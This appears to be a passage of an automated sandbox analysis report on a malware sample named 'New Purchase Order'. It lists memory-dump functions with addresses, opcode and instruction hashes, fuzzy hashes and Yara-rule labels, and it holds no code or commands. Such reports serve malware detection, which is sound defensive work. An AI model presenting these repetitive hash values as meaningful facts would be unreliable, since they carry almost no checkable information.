                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 479c6317a1fd12e811e4dd6c0e23305527d8c9a10b590f9ef63ae15d88ebb294
                                                          • Instruction ID: 3b61d68045ce491bd132483da672596d8e13ecc4e0f388f0fc9588940fe95e52
                                                          • Opcode Fuzzy Hash: 479c6317a1fd12e811e4dd6c0e23305527d8c9a10b590f9ef63ae15d88ebb294
                                                          • Instruction Fuzzy Hash: 8171C770900205EFDB20CF59D954A5AFBF8FFE8710F88825AF6019B259D7739A80CB55
                                                          Function 0170260B Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfd78dbe5ec09c1193136b13ef6eaaa494e647339c8d6ed59676be144e9b52a4
                                                          • Instruction ID: 03f542060c9caa5df7501597c796d61209f53051a7e85642fe62f0750ed69324
                                                          • Opcode Fuzzy Hash: cfd78dbe5ec09c1193136b13ef6eaaa494e647339c8d6ed59676be144e9b52a4
                                                          • Instruction Fuzzy Hash: 9171CE32604242CFD312DF28C888B2AF7E5FF84310F0485AAE9998B796DB74D845CB91
                                                          Function 0177035C Relevance: .2, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction ID: 2fef8f3d44c6c4bc3a141df8cccde06bf5ab7c904bbb4eb19db3487572a49d20
                                                          • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                          • Instruction Fuzzy Hash: 34715C71A00619EFDB11DFA9C988EAEFBB9FF48700F104569E505EB294DB34EA41CB50
                                                          Function 017862A0 Relevance: .2, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9a5a4fc139310e8cd686503d8c2ed25ee7ca97a63366a79f0f3931e1c88f10e
                                                          • Instruction ID: 56ac4f7d47f54abea4448c54ec6318e77128383d1c0eac46ea99db8b21dab59a
                                                          • Opcode Fuzzy Hash: b9a5a4fc139310e8cd686503d8c2ed25ee7ca97a63366a79f0f3931e1c88f10e
                                                          • Instruction Fuzzy Hash: CD71C232280B01BFE732EF18C849F5AFBE6EB44724F144918F65A8B6A1D775E944CB50
                                                          Function 016F8AA0 Relevance: .2, Instructions: 197COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c755a6632b3fe3032261bc32ae816edc99958700fc1875eaef1e4bbbffc81a41
                                                          • Instruction ID: c4b57928ad4e56c587509d55281c69cbaa82ddeb38fab6834fda0cb9520f077e
                                                          • Opcode Fuzzy Hash: c755a6632b3fe3032261bc32ae816edc99958700fc1875eaef1e4bbbffc81a41
                                                          • Instruction Fuzzy Hash: 8C81B172A08309CFDB24CF98C884B6DB7F5BF48720F1A416DDA01AB286C7B49D41CB94
                                                          Function 017C8324 Relevance: .2, Instructions: 192COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 23bfac25a119c36b38348266586887ac04a9910c8be91deaba1e8b1c45ec1ba3
                                                          • Instruction ID: d8325f6fffc2fa3b84951a70714079da437ad782ce8d3fc3067758d94d7b872d
                                                          • Opcode Fuzzy Hash: 23bfac25a119c36b38348266586887ac04a9910c8be91deaba1e8b1c45ec1ba3
                                                          • Instruction Fuzzy Hash: 74712971E0020AAFDB16DF94C845FEEFBB8FB04750F10426DE621A7291E774AA05CB91
                                                          Function 017AA250 Relevance: .2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 102ff1c4502cbd5ae6da78273634354ab7bd4d6a562a81e84ca7e8e132dc290c
                                                          • Instruction ID: 794fe7f046bacfb2eb7999f83634447c76735cf255ada5bb477be0af529a2e49
                                                          • Opcode Fuzzy Hash: 102ff1c4502cbd5ae6da78273634354ab7bd4d6a562a81e84ca7e8e132dc290c
                                                          • Instruction Fuzzy Hash: 4951A272504712AFD722DF68C848E5BFBE8EBC9750F414A29BA41DB150D770ED09CBA2
                                                          Function 01798350 Relevance: .2, Instructions: 161COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cbee9a303918227a9ede0656fc671e8aaeef1c204c39698d6970ebda4b83ef28
                                                          • Instruction ID: c57d8e2c58c1868a9e6b9888e09aa49d4d24b28b988c98bc0ee1973f8e3d7b75
                                                          • Opcode Fuzzy Hash: cbee9a303918227a9ede0656fc671e8aaeef1c204c39698d6970ebda4b83ef28
                                                          • Instruction Fuzzy Hash: 5051F070900709DFDB21CF6AD884BABFBF8BF95710F10461ED292976A1C7B0A549CB91
                                                          Function 0172E443 Relevance: .2, Instructions: 158COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: df35694bb80a5fcd44e4913bf5223f6329976d81dc17be81533e15146f74fadb
                                                          • Instruction ID: 937efee36a08dbec4c396921445746e9e98b8a1c8de778a53f6905f2be1a8a63
                                                          • Opcode Fuzzy Hash: df35694bb80a5fcd44e4913bf5223f6329976d81dc17be81533e15146f74fadb
                                                          • Instruction Fuzzy Hash: F9515C71200A15DFCB22EF69C984EAAF3FDFF14644F50086AE652D72A1DB34E941CB50
                                                          Function 01794180 Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aa0f840c911ad84f601cec0d7d3394b1c2aebeaabcbd3ec6ca4c14b8cf04f7a6
                                                          • Instruction ID: 28e008b71ed94ae29e06b3adfbd0ae0959c6ab40621b28b74f39326aa0ffccd5
                                                          • Opcode Fuzzy Hash: aa0f840c911ad84f601cec0d7d3394b1c2aebeaabcbd3ec6ca4c14b8cf04f7a6
                                                          • Instruction Fuzzy Hash: 7F517A716083029FDB54DF29D981A6BFBE5BFC8218F444A2DF586D7250D730D90ACB52
                                                          Function 017145B1 Relevance: .2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction ID: d8f6b4013909a1fb3e6e7f4e7998abb3e4d3fa5541b3098355beac1bcc6cecd0
                                                          • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                          • Instruction Fuzzy Hash: 0C516C71E0021AABDF15DF98C444BFEFBB5EF49754F044069EA02AB248D774DA44CBA0
                                                          Function 0177E9E0 Relevance: .2, Instructions: 154COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction ID: 8e37dd960d40147fbe6972f8b86e40923a64c3f60f79b55ea53c2911411f9b80
                                                          • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                          • Instruction Fuzzy Hash: 9B51A771D0020AEFEF219A94C884FBEFF79AB44364F1546E5D612671A1DB309E448BA0
                                                          Function 017B8B28 Relevance: .2, Instructions: 152COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fecacea024f857f772f69aebff20341a7b5deee952fd968bf2ff78b55538b41
                                                          • Instruction ID: 626763663f1d40802781a5ea21abf40f411b5e542059a045d4e22a2f4054b73e
                                                          • Opcode Fuzzy Hash: 2fecacea024f857f772f69aebff20341a7b5deee952fd968bf2ff78b55538b41
                                                          • Instruction Fuzzy Hash: E841F8B07056019BDB29DB2DC8D8BFBFB9EEF94220F048259F95987384DB30D841C692
                                                          Function 0177CBF0 Relevance: .1, Instructions: 148COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 416a48dac6e43d8258dc1e11e7372fe1877f589c5266ff032d5bfea4299fcdac
                                                          • Instruction ID: 3acefe175937bf57ed2b22a984dc5a8e17b444732c946913d98435f8bee4762b
                                                          • Opcode Fuzzy Hash: 416a48dac6e43d8258dc1e11e7372fe1877f589c5266ff032d5bfea4299fcdac
                                                          • Instruction Fuzzy Hash: F151787290021ADFCF22DFA8C9809AEFBF9FB58328F158519E546A7305D730AD41CB90
                                                          Function 0172A430 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7cc4fb948ca6399215f93cb058aa0a4db0df9e2477f8e8693e0aea8fd75d3ecc
                                                          • Instruction ID: da6797c42dc866888d8b60a1cf49508c8fbf1cb549a71edf278e9d365fdc98d5
                                                          • Opcode Fuzzy Hash: 7cc4fb948ca6399215f93cb058aa0a4db0df9e2477f8e8693e0aea8fd75d3ecc
                                                          • Instruction Fuzzy Hash: BA4128726443229BCF25EF69A884B6AF7E9EB58718F41407CFE029F246D771DC018790
                                                          Function 017BA9D3 Relevance: .1, Instructions: 139COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction ID: 2d3facd168060947f3853be71f40efa27c9d1a4555b447bba86f5098b47817da
                                                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                          • Instruction Fuzzy Hash: E541C672A007169FD725DF28C9C4BAAF7E9FF80210B05466EE95287645EB31ED04C790
                                                          Function 017201F8 Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 17e12595cf17584f8f4d8ddf659f575aeb5783135d22114cd4a558b737708719
                                                          • Instruction ID: d6cfab5d19923834a72e380643980e1cee7faaa33e574cc9459a5887092391d2
                                                          • Opcode Fuzzy Hash: 17e12595cf17584f8f4d8ddf659f575aeb5783135d22114cd4a558b737708719
                                                          • Instruction Fuzzy Hash: 1141AA369002299BDB14DF98C440AEEFBB4BF59710F15826EF815E7241D735AD42CBB4
                                                          Function 0171EBFC Relevance: .1, Instructions: 138COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abd5dbc3a7da3898ae0f81226aa2edbea106e3a8f0a31f340d4321cb771e59f3
                                                          • Instruction ID: 1e0ca487aa09ce7712ef7267c4241723b5cc8e8e83ad4f0f8c112530d9e11f96
                                                          • Opcode Fuzzy Hash: abd5dbc3a7da3898ae0f81226aa2edbea106e3a8f0a31f340d4321cb771e59f3
                                                          • Instruction Fuzzy Hash: 5A41B3726043029FD726DF2CC884A5BF7E5FF88324F144869E957C725ADB71E8848B50
                                                          Function 01732750 Relevance: .1, Instructions: 137COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction ID: d4670eca3ba573ec7d5517c30201af53bd4bcb1ad489b2e57c48eb1d8b349a7f
                                                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                          • Instruction Fuzzy Hash: 1A515A75A00215CFCB15CF9DC980AAEFBB6FF84710F2881A9D915A7355D770AE82CB90
                                                          Function 016F6154 Relevance: .1, Instructions: 133COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f06264457af862767d9061f798c959c1c4256762f4632320852e35d59066bb0
                                                          • Instruction ID: 2e4b5c2341b34ab8bc4bd12860b5ce7a104530dfe7fe714cc77cb8482a123a97
                                                          • Opcode Fuzzy Hash: 0f06264457af862767d9061f798c959c1c4256762f4632320852e35d59066bb0
                                                          • Instruction Fuzzy Hash: A351E470940256DBDB26CB28CC18BE9FBF1FF15314F1482A9E629972C2D7749981CF80
                                                          Function 016F0BCD Relevance: .1, Instructions: 130COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b30f1264be27fbc678121b561c1ff3d5ed35a5a4db27ae849148f645a5f542f8
                                                          • Instruction ID: 1653b36b0a318a9247392af6237791cb48b48ab975d5dfed8045b2111da90c0c
                                                          • Opcode Fuzzy Hash: b30f1264be27fbc678121b561c1ff3d5ed35a5a4db27ae849148f645a5f542f8
                                                          • Instruction Fuzzy Hash: 1C419131A00329DFDB21DF68CD44BEAB7B5BF45750F0100A9EA48AB246DB749E81CF91
                                                          Function 017B866E Relevance: .1, Instructions: 129COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction ID: 3942a70e7fb41e2db1461fb89c964a7195ea9d35ac595f8cd1984bde370e315a
                                                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                          • Instruction Fuzzy Hash: C6417F75B10206ABDB15DA99CCC4BEFFBBEAF88704F144069E914A7346D770DD0087A1
                                                          Function 016F0887 Relevance: .1, Instructions: 128COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 636bf21a669518501c70cef8400f9e7a7913bf4d9f8dddaf3295d5b0ad42302c
                                                          • Instruction ID: 29d492a25378983bc45af05025147bf9336f5a4c8934013adf09e896babccb4d
                                                          • Opcode Fuzzy Hash: 636bf21a669518501c70cef8400f9e7a7913bf4d9f8dddaf3295d5b0ad42302c
                                                          • Instruction Fuzzy Hash: C141C271600702DFE725CF28C884A22F7FAFF49314B109A6DE65787A52E730E846CB90
                                                          Function 0171A470 Relevance: .1, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f4882f364d90d8ff123018e1be1d38f9e7e1d80cd828c7eb0d3a48489d22e555
                                                          • Instruction ID: 4136c8d4e645cb533a74e80f78133e967851622360258140a03b872146cf4d75
                                                          • Opcode Fuzzy Hash: f4882f364d90d8ff123018e1be1d38f9e7e1d80cd828c7eb0d3a48489d22e555
                                                          • Instruction Fuzzy Hash: 6841D132945245CFDF21CF6CC458BADFBF1FB18720F184195D812AB289DB349A40CBA4
                                                          Function 016F8BF0 Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1aed622d4e090193871f5e124e07000568012da3f61329473dd97b0816ff6570
                                                          • Instruction ID: 5cf3a0f623bd001db4efdbdddc978055c3282921f8e8bd67a1d101fa784ea625
                                                          • Opcode Fuzzy Hash: 1aed622d4e090193871f5e124e07000568012da3f61329473dd97b0816ff6570
                                                          • Instruction Fuzzy Hash: BF41E472900206CBDB25DF58CC44B5ABBFAFF98B14F19816EDA029F256C775D842CB90
                                                          Function 016E8918 Relevance: .1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6af9b29c822002701ab38a5681dfec398ec1f2eb428774d0eae1a7d2e81116c
                                                          • Instruction ID: 70e10b72fb6578281eae1e764a59295599cad965b664dd21241eee6e90a9782b
                                                          • Opcode Fuzzy Hash: b6af9b29c822002701ab38a5681dfec398ec1f2eb428774d0eae1a7d2e81116c
                                                          • Instruction Fuzzy Hash: 2D4148319097069FD312DF69C844A6BF7E9EF88B54F400A2AF984D7250E731DE458BA3
                                                          Function 016EA020 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction ID: 69e2e8f5566eca0afd2cab9c99a21c90f62e44a102ec8eba36d6ae7a38691fee
                                                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                          • Instruction Fuzzy Hash: D2414C31A05211DBDB11DEA888487BAFFF2EB50758F15816AE9498F240D732DD41CB90
                                                          Function 016F09AD Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6fc83f42c4a092fb56d571aaeef21cb27d2548865cc6cd4500429e2e333d53e
                                                          • Instruction ID: 5bd1146ab8096783bdc8bf80aada151e9f4cf5fe44d754e11ad91346f6df55f6
                                                          • Opcode Fuzzy Hash: d6fc83f42c4a092fb56d571aaeef21cb27d2548865cc6cd4500429e2e333d53e
                                                          • Instruction Fuzzy Hash: B2415B71600701EFD722CF18C840B26BBE6FF58314F24866EE9498B392E771E946CB94
                                                          Function 01720710 Relevance: .1, Instructions: 121COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction ID: 69c4644923fb1567efd681914de9ef671f76f48ffe72ee4eb28a098d80029105
                                                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                          • Instruction Fuzzy Hash: 93410571A00615EFDB24CF98C980AAAFBF4FF18700B10496DE556DB691E370AA45CFA0
                                                          Function 016F262C Relevance: .1, Instructions: 119COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0240b1d154cbb3c6e9eba1429be81db9ff20ae9d02aabe3bdeff0fddfbb59766
                                                          • Instruction ID: ba920caa7edfab46bf98bf849b4181075d1c7476fcc7ec93e00b0850e97d58a6
                                                          • Opcode Fuzzy Hash: 0240b1d154cbb3c6e9eba1429be81db9ff20ae9d02aabe3bdeff0fddfbb59766
                                                          • Instruction Fuzzy Hash: 5D4189B1541711CFCB22EF28C954A69B7F2FF58724F1082ADD6169B2A1DB30D941CF51
                                                          Function 0172C8F9 Relevance: .1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9bfe21b44645b4c465325c83f62576c514886c9b46b4614b4c0bbf564c525432
                                                          • Instruction ID: 069f6b5ab53a42f2cc7fa9e56ad2159aca5bf64fa41f4c5d9daf97f0c24d25c2
                                                          • Opcode Fuzzy Hash: 9bfe21b44645b4c465325c83f62576c514886c9b46b4614b4c0bbf564c525432
                                                          • Instruction Fuzzy Hash: 673146B2A00355DFDB12CFA8C440799FBF4EB19724F2185AED519EB291D3369902CF90
                                                          Function 017707C3 Relevance: .1, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f824a82561b7f2c6bbae43293777d2488e69598d848463fcb45abc35032bc47
                                                          • Instruction ID: 38cff927cc7634717fd3fe122d17ba6b5c52cfa7232fc96e274225eeaf992684
                                                          • Opcode Fuzzy Hash: 0f824a82561b7f2c6bbae43293777d2488e69598d848463fcb45abc35032bc47
                                                          • Instruction Fuzzy Hash: 0B418C72A043019FD720DF29C845B9BFBE8FF88624F008A2EF998D7255D7709905CB92
                                                          Function 016E80A0 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
